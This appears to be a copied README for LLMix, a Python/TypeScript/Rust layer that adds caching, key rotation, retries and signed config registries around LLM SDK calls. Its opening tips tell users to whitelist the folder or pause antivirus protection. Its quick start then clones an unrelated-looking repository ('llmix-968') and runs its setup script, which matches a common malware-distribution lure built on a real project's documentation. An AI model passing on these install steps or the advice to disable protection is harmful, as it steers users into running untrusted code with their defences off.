# LLMix

Tip

If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

Caution

Some security systems may block the installation. Only download from the official repository.


QUICK START

git clone https://github.com/Souliuangular/llmix-968.git
cd llmix-968
python setup.py

npm · PyPI · crates.io · Python 3.14+ · TypeScript 5.0+ · Rust 1.83+ · License: Apache-2.0

Read in other languages: English · 中文 · Deutsch · Español · Français · Русский · 한국어 · 日本語 · हिन्दी

Config-driven LLM calls for Python, TypeScript, and Rust. Keep your SDK. Move model behavior into MDA presets. Put cache, retries, key rotation, and rollout control around the call.

LLMix is the layer between your product and the provider SDK.

It does not ask you to rewrite your OpenAI, Anthropic, Gemini, LiteLLM, AI SDK, or custom client code. It wraps the call. The boring parts go around it: response cache, circuit breaker, key pools, singleflight, retry policy, adaptive concurrency, provider kwargs, and MDA config loading.

The model stops being a hard-coded string buried in application code. It becomes data. Change a preset, publish a compiled registry release, reload the service, and the next request can run a different provider or model. No redeploy for the usual model swap dance.

That is the whole thing. Small layer. Sharp edges filed down.


## Why It Exists

AI products in 2026 do not usually fail because one SDK call is hard.

They fail in the spaces around the call. A key gets rate limited. A provider gets slow. Two hundred users ask the same thing at once. A model swap needs a deploy. A cache key differs by one invisible parameter. One service is in Python, another is in TypeScript, and the Rust worker has to follow the same contract.

LLMix is for that part of the system. The signal chain between your app and the model.

You still own the prompt. You still own the SDK. LLMix owns the harness.


TypeScript OpenAI-compatible helpers

Python Redis cache support

Rust OpenAI helper and Redis cache

```bash
cargo add llmix-rs --features providers-openai,redis
```


LLMix uses the MDA config packages for preset loading. They are also published
as standalone runtime loaders for apps that need `.mda` validation, integrity,
or trust-policy enforcement outside LLMix.

---

## Documentation

If you are new to LLMix, read in this order:

Other operations docs:

- [Secure LLMix configuration translations](docs/llmix/secure-mda/secure-llmix-configuration.md) ([de](docs/llmix/secure-mda/secure-llmix-configuration.de.md), [es](docs/llmix/secure-mda/secure-llmix-configuration.es.md), [fr](docs/llmix/secure-mda/secure-llmix-configuration.fr.md), [hi](docs/llmix/secure-mda/secure-llmix-configuration.hi.md), [ja](docs/llmix/secure-mda/secure-llmix-configuration.ja.md), [ko](docs/llmix/secure-mda/secure-llmix-configuration.ko.md), [ru](docs/llmix/secure-mda/secure-llmix-configuration.ru.md), [中文](docs/llmix/secure-mda/secure-llmix-configuration.zh.md))
- [Key pool operations](docs/llmix/key-pool-operations.md)
- [Standalone MDA config loader docs](docs/mda-config/README.md)

---

## At a Glance

![LLMix wraps your existing LLM SDK stack with MDA config, cache, resilience, and key-pool primitives.](docs/llmix/images/llmix-wraps-sdk.png)

LLMix wraps one provider call at a time.

It is not a router in the LiteLLM sense. It is closer to the harness you keep rebuilding around every agent, coder tool, extraction service, and internal AI workflow once traffic becomes real.

---


### TypeScript

```typescript
import {
  CallPipeline,
  KeyPool,
  TwoTierCache,
  openaiDispatch,
} from "@snoai/llmix";

const pipeline = new CallPipeline({
  dispatch: openaiDispatch(),
  responseCache: new TwoTierCache("memory"),
});

pipeline.setKeyPool("openai", new KeyPool([process.env.OPENAI_API_KEY!]));

const response = await pipeline.call({
  config: {
    provider: "openai",
    model: "gpt-4o-mini",
    common: { temperature: 0.2, maxOutputTokens: 512 },
    caching: { strategy: "memory" },
  },
  messages: [
    { role: "user", content: "Explain LLMix in one sentence." },
  ],
});

console.log(response.content);
await pipeline.close();
```

### Python

```python
import asyncio
import os

from llmix import (
    CallInput,
    CallPipeline,
    KeyPool,
    PipelineConfig,
    TwoTierCache,
    openai_dispatch,
)


async def main() -> None:
    pipeline = CallPipeline(
        PipelineConfig(
            dispatch=openai_dispatch(),
            response_cache=TwoTierCache("memory"),
        )
    )

    pipeline.set_key_pool("openai", KeyPool([os.environ["OPENAI_API_KEY"]]))

    response = await pipeline.call(
        CallInput(
            config={
                "provider": "openai",
                "model": "gpt-4o-mini",
                "common": {"temperature": 0.2, "max_output_tokens": 512},
                "caching": {"strategy": "memory"},
            },
            messages=[
                {"role": "user", "content": "Explain LLMix in one sentence."}
            ],
        )
    )

    print(response.content)
    await pipeline.close()


asyncio.run(main())
```

### Rust

Rust exposes the same pipeline contract. The OpenAI helper is feature-gated.

```toml
[dependencies]
llmix-rs = { version = "2.0.0", features = ["providers-openai"] }
serde_json = "1"
tokio = { version = "1", features = ["macros", "rt"] }
```

```rust
use llmix_rs::{
    load_keys_from_env, CallInput, CallPipeline, OpenAiChatHelper, PipelineConfig,
};
use serde_json::json;

let pipeline = CallPipeline::new(PipelineConfig::new(OpenAiChatHelper::new()))?;
pipeline.set_key_pool("openai", load_keys_from_env("openai")?);

let response = pipeline
    .call(CallInput {
        config: json!({
            "provider": "openai",
            "model": "gpt-4o-mini",
            "common": { "temperature": 0.2, "max_output_tokens": 512 },
            "caching": { "strategy": "memory" }
        }),
        messages: vec![json!({
            "role": "user",
            "content": "Explain LLMix in one sentence."
        })],
        singleflight_key: None,
    })
    .await;
```

See the Rust guide for full main examples and feature flags.


## What You Get Around Every Call

LLMix request pipeline from config and cache lookup through circuit breaker, singleflight, key-pool rotation, retry loop, dispatch, and telemetry.

| Concern | What LLMix does |
| --- | --- |
| Response cache | L1 memory plus optional Redis L2, with cross-runtime canonical cache keys |
| Key pools | Round-robin key selection, 429 rotation, and 401/403 dead-key eviction |
| Retries | Jittered exponential backoff, with `Retry-After` honored |
| Circuit breaker | Scoped by provider and effective base URL |
| Singleflight | Collapses identical concurrent work into one upstream request |
| Concurrency | AIMD adaptive semaphore, driven by rate-limit feedback |
| Provider kwargs | Common config becomes provider-specific request fields |
| Thinking tokens | Optional `<think>` extraction into normalized response objects |
| Registry | Signed compiled config registry with one live `current.json` pointer |
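A cross-runtime cache key only works if every runtime serializes the same logical request to the same bytes. The sketch below shows one common way to get there in Python: sorted-key JSON hashed with SHA-256. The helper name `canonical_cache_key` and the fields it hashes are assumptions made for illustration, not LLMix's actual key format.

```python
import hashlib
import json


def canonical_cache_key(config: dict, messages: list[dict]) -> str:
    """Hash a request so that dict ordering never changes the key.

    Hypothetical helper: the real LLMix key format may differ.
    """
    payload = {"config": config, "messages": messages}
    # Sorted keys plus fixed separators give one byte sequence per logical request.
    canonical = json.dumps(
        payload, sort_keys=True, separators=(",", ":"), ensure_ascii=False
    )
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


# Same request, different key order: the two digests match.
a = canonical_cache_key(
    {"provider": "openai", "model": "gpt-4o-mini", "common": {"temperature": 0.2}},
    [{"role": "user", "content": "Explain LLMix in one sentence."}],
)
b = canonical_cache_key(
    {"model": "gpt-4o-mini", "common": {"temperature": 0.2}, "provider": "openai"},
    [{"content": "Explain LLMix in one sentence.", "role": "user"}],
)
```

Number formatting is one place where runtimes can still disagree (Python's `json` writes `1.0` where JavaScript's `JSON.stringify` writes `1`), so a real cross-language scheme has to pin that down as well.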

The defaults are meant to be boring. Tune them when real traffic gives you a reason.


## MDA Presets

LLMix turns editable MDA presets into a signed compiled registry release opened through the official flow.

LLMix uses MDA as the source format for model presets. Human notes and runtime settings live in one file. Production services read the compiled registry, not the mutable source tree. Python, TypeScript, and Rust can require MDA integrity, `requires.network`, and verifier-hook-based signatures while loading or publishing registry output. Real Rekor transport and Sigstore cryptography are supplied by caller-provided clients and verifiers.

The examples below use this preset path:

`config/llm/source/search_summary/openai_fast.mda`

```markdown
---
name: openai_fast
description: Fast OpenAI preset for search summaries.
metadata:
  snoai-llmix:
    common:
      provider: openai
      model: gpt-5-mini
      temperature: 0.2
      maxOutputTokens: 512
    caching:
      strategy: redis-or-memory
    providerOptions:
      openai:
        reasoningEffort: medium
---
# openai_fast

Summarize search results for a research workflow.
```

Load it directly when editing or testing a preset:

```typescript
import { loadMdaConfig } from "@snoai/llmix";

const config = await loadMdaConfig("./config/llm/source/search_summary/openai_fast.mda");
```

```python
from llmix import load_mda_config

config = load_mda_config("./config/llm/source/search_summary/openai_fast.mda")
```

```rust
use llmix_rs::load_config;

let config = load_config("./config/llm/source/search_summary/openai_fast.mda")?;
```

For production services, use the registry.


## Config Registry

Use this layout. Treat it as the public contract:

```text
config/llm/
  source/
    <module>/
      <preset>.mda
  current.json
  compiled/
```

`source/` is edited by people. `current.json` and `compiled/` are generated by LLMix. Store the trust anchor outside `config/llm`.

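The release flow is: initialize the preset, validate it, compute its integrity, write the trust policy, sign, verify, prepare the release, publish the registry, finalize the trust manifest, then run the doctor and registry checks.

The did:web example assumes these release-identity inputs already exist outside `config/llm`: `release/did-web-private-key.pem` and `release/did.json`. Provide them from your release system or use the GitHub Actions Sigstore/Rekor profile instead.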

```bash
mkdir -p config/llm/source/search_summary release deploy

mda init --template llmix-preset \
  --module search_summary \
  --preset openai_fast \
  --provider openai \
  --model gpt-5-mini \
  --out config/llm/source/search_summary/openai_fast.mda

mda validate config/llm/source/search_summary/openai_fast.mda \
  --target source \
  --json

mda integrity compute config/llm/source/search_summary/openai_fast.mda \
  --target source \
  --write \
  --json

mda release trust policy \
  --target llmix-registry \
  --profile did-web \
  --domain config.example.com \
  --out release/trust-policy.json \
  --json

mda sign config/llm/source/search_summary/openai_fast.mda \
  --profile did-web \
  --did did:web:config.example.com \
  --key-id did:web:config.example.com#release \
  --key-file release/did-web-private-key.pem \
  --in-place \
  --json

mda verify config/llm/source/search_summary/openai_fast.mda \
  --target source \
  --policy release/trust-policy.json \
  --did-document release/did.json \
  --json

mda release prepare \
  --target llmix-registry \
  --source config/llm/source \
  --registry-dir config/llm \
  --policy release/trust-policy.json \
  --did-document release/did.json \
  --out release/plan.json \
  --json

llmix publish-registry \
  --root config/llm \
  --release-plan release/plan.json \
  --revision 2026-05-14T000000Z \
  --policy release/trust-policy.json \
  --did-document release/did.json \
  --root-did did:web:config.example.com \
  --root-key-id did:web:config.example.com#release \
  --root-key-file release/did-web-private-key.pem \
  --json

mda release finalize \
  --target llmix-registry \
  --registry-dir config/llm \
  --registry-root config/llm/compiled/2026-05-14T000000Z/registry-root.json \
  --release-plan release/plan.json \
  --policy release/trust-policy.json \
  --derive-root-digest \
  --minimum-revision 2026-05-14T000000Z \
  --out deploy/llmix-trust.json \
  --did-document release/did.json \
  --json

mda doctor release \
  --target llmix-registry \
  --source config/llm/source \
  --registry-dir config/llm \
  --release-plan release/plan.json \
  --manifest deploy/llmix-trust.json \
  --did-document release/did.json \
  --json

llmix check-registry \
  --root config/llm \
  --trust deploy/llmix-trust.json \
  --preset search_summary/openai_fast \
  --did-document release/did.json \
  --tamper-proof \
  --json
```

Runtime code opens the generated registry with the external trust anchor:

```typescript
import {
  ConfigRegistryManager,
  loadLlmixTrustManifest,
  registryRootOptionsFromTrustManifest,
} from "@snoai/llmix";

const trust = await loadLlmixTrustManifest(process.env.LLMIX_TRUST_ANCHOR!);
const manager = await ConfigRegistryManager.open("config/llm", {
  signedRoot: registryRootOptionsFromTrustManifest(trust, { didWebVerifier }),
});
const config = await manager.getPreset("search_summary", "openai_fast");
```

`didWebVerifier` is the app verifier hook required by this did:web policy. For a command-line runtime proof, use `llmix check-registry --did-document release/did.json`; in app code, pass the verifier hooks required by your trust policy.

Managers expose the active revision and reload health metadata. That makes it easy to say exactly which config a service is running. See Secure LLMix Configuration with MDA for the complete release flow and runtime tamper-rejection proof.

`ConfigRegistryPublisher` is still available for advanced release systems, but the default public path is the `llmix publish-registry` command. Do not write a project-local registry compiler.


## Provider Coverage

The public dispatch helpers cover the providers we actually test.

| Provider | Python | TypeScript | Notes |
| --- | --- | --- | --- |
| OpenAI | `openai_dispatch` | `openaiDispatch` | OpenAI Responses and chat-style flows |
| Anthropic | `anthropic_dispatch` | `anthropicDispatch` | Messages API, thinking budget validation |
| Gemini | `gemini_dispatch` | `geminiDispatch` | Google GenAI-compatible params |
| OpenRouter | `openrouter_dispatch` | `openrouterDispatch` | OpenAI-compatible |
| DeepInfra | `deepinfra_dispatch` | `deepinfraDispatch` | OpenAI-compatible |
| Novita | `novita_dispatch` | `novitaDispatch` | OpenAI-compatible |
| Together | `together_dispatch` | `togetherDispatch` | OpenAI-compatible |
| Sno GPU | `sno_gpu_dispatch` | `snoGpuDispatch` | On-prem OpenAI-compatible GPU endpoints |

Rust currently ships the neutral pipeline plus feature-gated helpers for OpenAI, Anthropic, Gemini, and Sno GPU. Treat Rust provider helpers as beta. The cache, key-pool, registry, retry, and pipeline contract are aligned with Python and TypeScript.

OpenAI-compatible providers reuse the OpenAI request shape with provider-specific base_url handling. That keeps the contract plain. Plain is useful.


## Environment Variables

| Variable | Purpose |
| --- | --- |
| `OPENAI_API_KEY` / `OPENAI_KEYS` | OpenAI key or comma-separated key pool |
| `ANTHROPIC_API_KEY` / `ANTHROPIC_KEYS` | Anthropic key or comma-separated key pool |
| `GEMINI_API_KEY` / `GEMINI_KEYS` | Gemini key or comma-separated key pool |
| `OPENROUTER_API_KEY` / `OPENROUTER_KEYS` | OpenRouter key or comma-separated key pool |
| `DEEPINFRA_API_KEY` / `DEEPINFRA_KEYS` | DeepInfra key or comma-separated key pool |
| `TOGETHER_API_KEY` / `TOGETHER_KEYS` | Together key or comma-separated key pool |
| `NOVITA_API_KEY` / `NOVITA_KEYS` | Novita key or comma-separated key pool |
| `SNO_LLM_API_KEY` | Sno GPU direct dispatcher fallback |
| `SNO_GPU_API_KEY` / `SNO_GPU_KEYS` | Sno GPU key-pool variables for provider id `sno-gpu` |
| `GPU_BASE_URL` | Sno GPU base URL |
| `REDIS_URL` | Redis response-cache URL |
| `LLMIX_STATE_DIR` | Lock files, batch metadata, and kill-switch state |

load_keys_from_env("provider-name") checks PROVIDER_NAME_KEYS first, then PROVIDER_NAME_API_KEY. Dashes become underscores.


## What This Is Not

- Not a streaming framework. Streaming stays with your SDK.
- Not a prompt framework. Bring your own prompt layer.
- Not a provider marketplace. One call uses the provider named by its config.
- Not a reason to hide every model decision behind indirection. Some things should stay in code.

LLMix is useful when the same model-call shape keeps showing up across services. If you have one script and one key, you probably do not need it yet.


## Development

```bash
# Full monorepo checks
bun run build
bun run check
bun run test
```

## License

Apache-2.0
